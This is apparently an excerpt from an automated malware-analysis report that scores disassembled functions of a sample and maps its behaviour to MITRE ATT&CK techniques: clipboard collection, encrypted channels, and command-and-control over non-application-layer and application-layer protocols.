Function 03941000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Function 004243A0 Relevance: 18.0, APIs: 2, Strings: 8, Instructions: 486
COMMON

Function 00435BD0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 140
COMMON

Function 004151D0 Relevance: 9.6, APIs: 1, Strings: 4, Instructions: 854
COMMON

Function 00408660 Relevance: 7.7, APIs: 5, Instructions: 232
threadCOMMON

Function 0042F775 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 349
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre